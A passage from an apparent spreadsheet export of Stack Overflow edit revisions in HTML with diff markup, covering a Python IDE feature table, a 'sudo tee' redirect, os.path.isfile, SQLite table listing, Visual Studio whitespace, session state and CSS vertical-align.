 KDevelop       |Y | F |  | Y |  |  |Y |Y |Y |Y |   |Y |  |  |   |  |   |_x000D_
 Komodo         |Y |C/F|Y | Y |Y |Y |Y |Y |Y |Y |   |Y |Y |Y |   |Y |   |_x000D_
 NetBeans*      |Y | F |Y | Y |Y |  |Y |Y |Y |Y | Y |Y |Y |Y |   |  | Y |*pre-v7.0_x000D_
 NotePad++      |W | F |  | Y |  |  |  |Y*|  |Y |   |  |  |  |   |  |   |*with plugin_x000D_
 Pfaide         |W | C |Y | Y |  |  |  |Y |Y |Y |   |Y |Y |  |   |  |   |_x000D_
 PIDA           |LW| F |Y | Y |  |  |  |Y |Y |Y |   |Y |  |  |   |  |   |VIM based_x000D_
 PTVS           |W | F |Y | Y |Y |Y |Y |Y |Y |Y |   |Y |  |  |Y* |  | Y |*WPF bsed_x000D_
 PyCharm        |Y | C |Y | Y*|Y |  |Y |Y |Y |Y |   |Y |  |Y |   |  |   |*javascript_x000D_
 PyDev(Eclipse) |Y | F |Y | Y |Y |Y |Y |Y |Y |Y | Y |Y |Y |Y |   |  |   |_x000D_
 Pyscripter     |W | F |Y |   |Y |Y |  |Y |  |Y |   |  |Y |Y |   |  |   |_x000D_
 PythonWin      |W | F |Y |   |Y |  |  |Y |Y |  |   |Y |  |  |   |  |   |_x000D_
 SciTE          |Y | F |  | Y |  |Y |  |  |Y |Y |   |Y |Y |  |   |  |   |_x000D_
 ScriptDev      |W | C |Y | Y |Y |Y |  |Y |Y |Y |   |Y |Y |  |   |  |   |_x000D_
 SPE            |  | F |Y |   |  |  |  |  |  |  | Y |  |  |  |   |  |   |_x000D_
 Spyder         |Y | F |Y |   |Y |Y |  |Y |Y |Y |   |  |  |  |   |  |   |_x000D_
 Sublime Text   |Y |C/F|Y | Y |  |  |  |Y |Y |Y |   |  |Y |  |   |  |   |extensible w/python_x000D_
 TextMate       |M |   |  | Y |  |  |  |Y |Y |Y |   |Y |Y |  |   |  |   |_x000D_
 UliPad         |Y | F |Y | Y |Y |  |  |Y |Y |  |   |  |Y |Y |   |  |   |_x000D_
 Vim            |Y | F |Y | Y |Y |Y |Y |Y |Y |Y |   |Y |Y |Y |   |  |   |_x000D_
 WingIde        |Y | C |Y | Y*|Y |Y |Y |Y |Y |Y |   |Y |Y |Y |   |  |   |*support for C_x000D_
 Zeus           |W | C |  |   |  |  |Y |Y |Y |Y |   |Y |Y |  |   |  |   |_x000D_
                +--+---+--+---+--+--+--+--+--+--+---+--+--+--+---+--+---+_x000D_
                |CP|C/F|AC|MLS|PD|EM|SC|SI|BM|LN|UML|CF|CT|UT|UID|DB|RAD|_x000D_
                |__|___|__|___|__|__|__|__|__|__|___|__|__|__|___|__|___|_x000D_
&lt;/pre&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; Acronyms used:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; CP - Cross Platform&lt;/li&gt; _x000D_
  &lt;li&gt; C - Commercial&lt;/li&gt; _x000D_
  &lt;li&gt; F - Free&lt;/li&gt; _x000D_
  &lt;li&gt; AC - Automatic Code-completion&lt;/li&gt; _x000D_
  &lt;li&gt; MLS - Multi-Language Support&lt;/li&gt; _x000D_
  &lt;li&gt; PD - Integrated Python Debugging&lt;/li&gt; _x000D_
  &lt;li&gt; EM - ErrorMarkup&lt;/li&gt; _x000D_
  &lt;li&gt; SC - Source Control integration&lt;/li&gt; _x000D_
  &lt;li&gt; SI - Smart Indent&lt;/li&gt; _x000D_
  &lt;li&gt; BM - Bracket Matching&lt;/li&gt; _x000D_
  &lt;li&gt; LN - Line Numbering&lt;/li&gt; _x000D_
  &lt;li&gt; UML - UML editing / viewing&lt;/li&gt; _x000D_
  &lt;li&gt; CF - Code Folding&lt;/li&gt; _x000D_
  &lt;li&gt; CT - Code Templates&lt;/li&gt; _x000D_
  &lt;li&gt; UT - Unit Testing&lt;/li&gt; _x000D_
  &lt;li&gt; UID - GUI Designer (for example, Qt, Eric, ..)&lt;/li&gt; _x000D_
  &lt;li&gt; DB - integrated database support&lt;/li&gt; _x000D_
  &lt;li&gt; RAD - Rapid application development support&lt;/li&gt; _x000D_
  &lt;li&gt; L - Linux&lt;/li&gt; _x000D_
  &lt;li&gt; W - Windows&lt;/li&gt; _x000D_
  &lt;li&gt; M - Mac&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; I don't mention basics like syntax highlighting as I expect these by default.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; This is a just dry list reflecting your feedback and comments, I am not advocating any of these tools. I will keep updating this list as you keep posting your answers.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;strong&gt;PS. Can you help me to add features of the above editors to the list (like auto-complete, debugging, etc.)?&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;h2&gt;Results&lt;/h2&gt; _x000D_
 &lt;pre&gt;                                       Rapid Application Development -._x000D_
                                           Integrated DB Support -+   |_x000D_
                                                GUI Designer  -+  |   |_x000D_
                                             Unit Testing -+   |  |   |_x000D_
                                        Code Templates -.  |   |  |   |_x000D_
                                       Code Folding -+  |  |   |  |   |_x000D_
                           UML Editing / Viewing -+  |  |  |   |  |   |_x000D_
                              Line Numbering -+   |  |  |  |   |  |   |_x000D_
                         Bracket Matching -+  |   |  |  |  |   |  |   |_x000D_
                          Smart Indent -+  |  |   |  |  |  |   |  |   |_x000D_
         Source Control Integration -+  |  |  |   |  |  |  |   |  |   |_x000D_
                   Error Markup  -+  |  |  |  |   |  |  |  |   |  |   |_x000D_
  Integrated Python Debugging -+  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
    Multi-Language Support -+  |  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
  Auto Code Completion -+   |  |  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
 Commercial / Free --+  |   |  |  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
 Cross Platform -+   |  |   |  |  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
                _|___|__|___|__|__|__|__|__|__|___|__|__|__|___|__|___|__x000D_
                |CP|C/F|AC|MLS|PD|EM|SC|SI|BM|LN|UML|CF|CT|UT|UID|DB|RAD|comments_x000D_
                +--+---+--+---+--+--+--+--+--+--+---+--+--+--+---+--+---+_x000D_
&lt;span class="diff-add"&gt;&amp;nbsp;&lt;/span&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-add"&gt;_x000D_
&lt;/span&gt; BlackAdder     |Y | C |  |   |  |  |  |Y |  |  |   |Y |  |  |   |  |   |_x000D_
 BlueFish       |L |   |  |   |  |  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
 ConTEXT        |W | C |  |   |  |  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
 DABO           |Y |   |  |   |  |  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
 DreamPie       |  | F |Y |   |  |  |  |Y |  |  |   |  |  |  |   |  |   |_x000D_
 Dr.Python      |  | F |  |   |  |Y |  |  |  |  |   |  |  |  |   |  |   |_x000D_
 Editra         |Y | F |Y | Y |  |  |Y |Y |Y |Y |   |Y |  |  |   |  |   |_x000D_
 Emacs          |Y | F |Y | Y |Y |Y |Y |Y |Y |Y | Y |Y |Y |Y |   |  |   |_x000D_
 Eric Ide       |Y | F |Y |   |Y |Y |  |Y |  |Y |   |Y |  |Y |   |  |   |_x000D_
 E-Texteditor   |W |   |  |   |  |  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
 Geany          |Y | F |Y*| Y |  |  |  |Y |Y |Y |   |Y |  |  |   |  |   |*very limited_x000D_
 Gedit          |Y | F |YÂ¹| Y |  |  |  |Y |Y |Y |   |  |YÂ²|  |   |  |   |Â¹ with plugin Â² sort of_x000D_
 Idle           |Y | F |Y |   |  |  |  |  |  |  |   |  |  |  |   |  |   |_x000D_
 JEdit          |Y | F |  | Y |  |  |  |  |Y |Y |   |Y |  |  |   |  |   |_x000D_
 KDevelop       |Y | F |  | Y |  |  |Y |Y |Y |Y |   |Y |  |  |   |  |   |_x000D_
 Komodo         |Y |C/F|Y | Y |Y |Y |Y |Y |Y |Y |   |Y |Y |Y |   |Y |   |_x000D_
 NetBeans*      |Y | F |Y | Y |Y |  |Y |Y |Y |Y | Y |Y |Y |Y |   |  | Y |*pre-v7.0_x000D_
 NotePad++      |W | F |  | Y |  |  |  |Y*|  |Y |   |  |  |  |   |  |   |*with plugin_x000D_
 Pfaide         |W | C |Y | Y |  |  |  |Y |Y |Y |   |Y |Y |  |   |  |   |_x000D_
 PIDA           |LW| F |Y | Y |  |  |  |Y |Y |Y |   |Y |  |  |   |  |   |VIM based_x000D_
 PTVS           |W | F |Y | Y |Y |Y |Y |Y |Y |Y |   |Y |  |  |Y* |  | Y |*WPF bsed_x000D_
 PyCharm        |Y | C |Y | Y*|Y |  |Y |Y |Y |Y |   |Y |  |Y |   |  |   |*javascript_x000D_
 PyDev(Eclipse) |Y | F |Y | Y |Y |Y |Y |Y |Y |Y | Y |Y |Y |Y |   |  |   |_x000D_
 Pyscripter     |W | F |Y |   |Y |Y |  |Y |  |Y |   |  |Y |Y |   |  |   |_x000D_
 PythonWin      |W | F |Y |   |Y |  |  |Y |Y |  |   |Y |  |  |   |  |   |_x000D_
 SciTE          |Y | F |  | Y |  |Y |  |  |Y |Y |   |Y |Y |  |   |  |   |_x000D_
 ScriptDev      |W | C |Y | Y |Y |Y |  |Y |Y |Y |   |Y |Y |  |   |  |   |_x000D_
 SPE            |  | F |Y |   |  |  |  |  |  |  | Y |  |  |  |   |  |   |_x000D_
 Spyder         |Y | F |Y |   |Y |Y |  |Y |Y |Y |   |  |  |  |   |  |   |_x000D_
 Sublime Text   |Y |C/F|Y | Y |  |  |  |Y |Y |Y |   |  |Y |  |   |  |   |extensible w/python_x000D_
 TextMate       |M |   |  | Y |  |  |  |Y |Y |Y |   |Y |Y |  |   |  |   |_x000D_
 UliPad         |Y | F |Y | Y |Y |  |  |Y |Y |  |   |  |Y |Y |   |  |   |_x000D_
 Vim            |Y | F |Y | Y |Y |Y |Y |Y |Y |Y |   |Y |Y |Y |   |  |   |_x000D_
 WingIde        |Y | C |Y | Y*|Y |Y |Y |Y |Y |Y |   |Y |Y |Y |   |  |   |*support for C_x000D_
 Zeus           |W | C |  |   |  |  |Y |Y |Y |Y |   |Y |Y |  |   |  |   |_x000D_
                +--+---+--+---+--+--+--+--+--+--+---+--+--+--+---+--+---+_x000D_
                |CP|C/F|AC|MLS|PD|EM|SC|SI|BM|LN|UML|CF|CT|UT|UID|DB|RAD|_x000D_
                |__|___|__|___|__|__|__|__|__|__|___|__|__|__|___|__|___|_x000D_
&lt;/pre&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; Acronyms used:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; CP - Cross Platform&lt;/li&gt; _x000D_
  &lt;li&gt; C - Commercial&lt;/li&gt; _x000D_
  &lt;li&gt; F - Free&lt;/li&gt; _x000D_
  &lt;li&gt; AC - Automatic Code-completion&lt;/li&gt; _x000D_
  &lt;li&gt; MLS - Multi-Language Support&lt;/li&gt; _x000D_
  &lt;li&gt; PD - Integrated Python Debugging&lt;/li&gt; _x000D_
  &lt;li&gt; EM - ErrorMarkup&lt;/li&gt; _x000D_
  &lt;li&gt; SC - Source Control integration&lt;/li&gt; _x000D_
  &lt;li&gt; SI - Smart Indent&lt;/li&gt; _x000D_
  &lt;li&gt; BM - Bracket Matching&lt;/li&gt; _x000D_
  &lt;li&gt; LN - Line Numbering&lt;/li&gt; _x000D_
  &lt;li&gt; UML - UML editing / viewing&lt;/li&gt; _x000D_
  &lt;li&gt; CF - Code Folding&lt;/li&gt; _x000D_
  &lt;li&gt; CT - Code Templates&lt;/li&gt; _x000D_
  &lt;li&gt; UT - Unit Testing&lt;/li&gt; _x000D_
  &lt;li&gt; UID - GUI Designer (for example, Qt, Eric, ..)&lt;/li&gt; _x000D_
  &lt;li&gt; DB - integrated database support&lt;/li&gt; _x000D_
  &lt;li&gt; RAD - Rapid application development support&lt;/li&gt; _x000D_
  &lt;li&gt; L - Linux&lt;/li&gt; _x000D_
  &lt;li&gt; W - Windows&lt;/li&gt; _x000D_
  &lt;li&gt; M - Mac&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; I don't mention basics like syntax highlighting as I expect these by default.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; This is a just dry list reflecting your feedback and comments, I am not advocating any of these tools. I will keep updating this list as you keep posting your answers.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;strong&gt;PS. Can you help me to add features of the above editors to the list (like auto-complete, debugging, etc.)?&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Aaron Hall â™¦</t>
  </si>
  <si>
    <t>Manuel Allenspach</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Someone here has just suggested sudoing tee:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;ls -hal /root/ | sudo tee /root/test.out &amp;gt; /dev/null_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This could also be used to redirect any command, to a directory that you do not have access to. It works because the tee program is effectively an "echo to a file" program, and the redirect to /dev/null is to stop it also outputting to the screen to keep it the same as the original contrived example above.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Someone here has just suggested sudoing tee:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;sudo &lt;/span&gt;ls -hal /root/ | sudo tee /root/test.out &amp;gt; /dev/null_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This could also be used to redirect any command, to a directory that you do not have access to. It works because the tee program is effectively an "echo to a file" program, and the redirect to /dev/null is to stop it also outputting to the screen to keep it the same as the original contrived example above.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jonathan</t>
  </si>
  <si>
    <t>Jim Mitchener</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can use&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;import&lt;/span&gt; os_x000D_
os.path.isfile(fname) _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; if you need to be sure it's a file.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can&lt;span class="diff-add"&gt; also&lt;/span&gt; use&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;import&lt;/span&gt; os&lt;span class="diff-add"&gt;.path&lt;/span&gt;_x000D_
os.path.isfile(fname) _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; if you need to be sure it's a file.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Nick T</t>
  </si>
  <si>
    <t>mlissner</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What &lt;code&gt;&lt;span class="diff-delete"&gt;SQL&lt;/span&gt;&lt;/code&gt; can be used to list the tables, and the rows within those tables in a &lt;code&gt;&lt;span class="diff-delete"&gt;SQLite&lt;/span&gt;&lt;/code&gt; database file - once I have attached it with the &lt;code&gt;ATTACH&lt;/code&gt; command on the &lt;code&gt;&lt;span class="diff-delete"&gt;SQLite&lt;/span&gt;&lt;/code&gt; 3 command line tool?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What &lt;span class="diff-add"&gt;SQL&lt;/span&gt; can be used to list the tables, and the rows within those tables in a &lt;span class="diff-add"&gt;SQLite&lt;/span&gt; database file - once I have attached it with the &lt;code&gt;ATTACH&lt;/code&gt; command on the &lt;span class="diff-add"&gt;SQLite&lt;/span&gt; 3 command line tool?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>izb</t>
  </si>
  <si>
    <t>Abhijit Bashetti</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is it possible to configure Visual Studio 2008 to automatically remove whitespace characters at the end of each line when saving a file?&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;&amp;nbsp;&lt;/span&gt; There doesn't seem to be a built-in option, so are there any extensions available to do this?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is it possible to configure Visual Studio 2008 to automatically remove whitespace characters at the end of each line when saving a file? There doesn't seem to be a built-in option, so are there any extensions available to do this?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>ChrisN</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you are using the &lt;strong&gt;default in-memory session management&lt;/strong&gt;,&lt;span class="diff-delete"&gt; will&lt;/span&gt; the session variables will be &lt;strong&gt;cleared&lt;/strong&gt; when worker process recycles&lt;span class="diff-delete"&gt;?&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you are using the &lt;strong&gt;default in-memory session management&lt;/strong&gt;, the session variables will be &lt;strong&gt;cleared&lt;/strong&gt; when worker process recycles&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Alexander</t>
  </si>
  <si>
    <t>Nick Wilson</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If the class file you want to look into is open source you should not decompile it, but instead attach the source files directly into your IDE. that way, you can just view the code of some library class as if it were your own&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If the class file you want to look into is open source&lt;span class="diff-add"&gt;,&lt;/span&gt; you should not decompile it, but instead attach the source files directly into your IDE. that way, you can just view the code of some library class as if it were your own&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>arturh</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Personally I like this one&lt;span class="diff-delete"&gt;:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.jeffpalm.com/fox/fox.jpg" rel="nofollow noreferrer"&gt;alt text http://www.jeffpalm.com/fox/fox.jpg&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Personally I like this one&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.jeffpalm.com/fox/fox.jpg" rel="nofollow noreferrer"&gt;alt text http://www.jeffpalm.com/fox/fox.jpg&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jeff Atwood harriyott</t>
  </si>
  <si>
    <t>harriyott</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;How to use&lt;/span&gt; the &lt;code&gt;vertical-align&lt;/code&gt; property&lt;span class="diff-delete"&gt; is explained within &lt;/span&gt;&lt;a href="http://phrogz.net/CSS/vertical-align/index.html" rel="nofollow noreferrer"&gt;Understanding &lt;code&gt;vertical-align&lt;/code&gt;, or "How (Not) To Vertically Center Content"&lt;/a&gt; by Gavin Kistner.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; In short, there are two scenarios: inline elements and block elements.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Inline Elements&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;kbd&gt;&lt;a href="http://jsfiddle.net/jBthq/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;example&lt;/span&gt;&lt;/a&gt;&lt;/kbd&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Only&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; inline elements can be vertically aligned in their context via &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;vertical-align: middle&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;. However, the&lt;/span&gt; &lt;em&gt;&lt;span class="diff-delete"&gt;context&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; isn’t the whole parent container height, it’s the height of the text line they’re in.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Block Elements&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Vertical alignment is harder for block elements and strongly depends on the specific situation, which includes&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;kbd&gt;&lt;a href="http://jsfiddle.net/YFncP/2/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;example&lt;/span&gt;&lt;/a&gt;&lt;/kbd&gt;&lt;span class="diff-delete"&gt; If the inner element can have a &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;fixed height&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt;, you can make its position &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;absolute&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; and specify its &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;height&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;, &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;margin-top&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; and &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;top&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; position.&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;kbd&gt;&lt;a href="http://jsfiddle.net/d4zGF/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;example&lt;/span&gt;&lt;/a&gt;&lt;/kbd&gt;&lt;span class="diff-delete"&gt; If the centered element&lt;/span&gt; &lt;strong&gt;&lt;span class="diff-delete"&gt;consists of a single line&lt;/span&gt;&lt;/strong&gt; &lt;em&gt;&lt;span class="diff-delete"&gt;and&lt;/span&gt;&lt;/em&gt; &lt;strong&gt;&lt;span class="diff-delete"&gt;its parent height is fixed&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; you&lt;/span&gt; can &lt;span class="diff-delete"&gt;simply set the container’s&lt;/span&gt; &lt;code&gt;&lt;span class="diff-delete"&gt;line&lt;/span&gt;-&lt;span class="diff-delete"&gt;height&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; to fill its height&lt;/span&gt;. &lt;span class="diff-delete"&gt;This method is quite versatile&lt;/span&gt; in&lt;span class="diff-delete"&gt; my experience&lt;/span&gt;.&lt;/li&gt; _x000D_
  &lt;li&gt; &lt;span class="diff-delete"&gt;…&lt;/span&gt; and &lt;span class="diff-delete"&gt;likely more special cases.&lt;/span&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Wow, this problem is popular. It's based on a misunderstanding in&lt;/span&gt; the &lt;code&gt;vertical-align&lt;/code&gt; property&lt;span class="diff-add"&gt;. This excellent article explains it:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;a href="http://phrogz.net/CSS/vertical-align/index.html" rel="nofollow noreferrer"&gt;Understanding &lt;code&gt;vertical-align&lt;/code&gt;, or "How (Not) To Vertically Center Content"&lt;/a&gt; by Gavin Kistner.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt;&amp;nbsp;&lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; In a nutshell&lt;/span&gt; &lt;sub&gt;&lt;sup&gt;&lt;span class="diff-add"&gt;(and to prevent link rot)&lt;/span&gt;&lt;/sup&gt;&lt;/sub&gt;:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;Inline elements&lt;/span&gt;&lt;/strong&gt; &lt;span class="diff-add"&gt;(and&lt;/span&gt; &lt;em&gt;&lt;span class="diff-add"&gt;only&lt;/span&gt;&lt;/em&gt; &lt;span class="diff-add"&gt;inline elements)&lt;/span&gt; can &lt;span class="diff-add"&gt;be vertically aligned in their context via&lt;/span&gt; &lt;code&gt;&lt;span class="diff-add"&gt;vertical&lt;/span&gt;-&lt;span class="diff-add"&gt;align: middle&lt;/span&gt;&lt;/code&gt;. &lt;span class="diff-add"&gt;However, the “context” isn’t the whole parent container height, it’s the height of the text line they’re&lt;/span&gt; in.&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;kbd&gt;&lt;a href="http://jsfiddle.net/jBthq/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;jsfiddle example&lt;/span&gt;&lt;/a&gt;&lt;/kbd&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; &lt;span class="diff-add"&gt;For block elements, vertical alignment is harder&lt;/span&gt; and &lt;span class="diff-add"&gt;strongly depends on the specific situation: &lt;/span&gt; _x000D_
   &lt;ul&gt; _x000D_
    &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
    &lt;li&gt;&lt;span class="diff-add"&gt; If the inner element can have a &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;fixed height&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt;, you can make its position &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;absolute&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; and specify its &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;height&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt;, &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;margin-top&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; and &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;top&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; position. &lt;/span&gt;&lt;kbd&gt;&lt;a href="http://jsfiddle.net/YFncP/2/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;jsfiddle example&lt;/span&gt;&lt;/a&gt;&lt;/kbd&gt;&lt;/li&gt; _x000D_
    &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
    &lt;li&gt;&lt;span class="diff-add"&gt; If the centered element &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;consists of a single line&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;and&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;its parent height is fixed&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt; you can simply set the container’s &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;line-height&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; to fill its height. This method is quite versatile in my experience. &lt;/span&gt;&lt;kbd&gt;&lt;a href="http://jsfiddle.net/d4zGF/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;jsfiddle example&lt;/span&gt;&lt;/a&gt;&lt;/kbd&gt;&lt;/li&gt; _x000D_
    &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
    &lt;li&gt;&lt;span class="diff-add"&gt; … there are be more such special cases.&lt;/span&gt;&lt;/li&gt; _x000D_
    &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
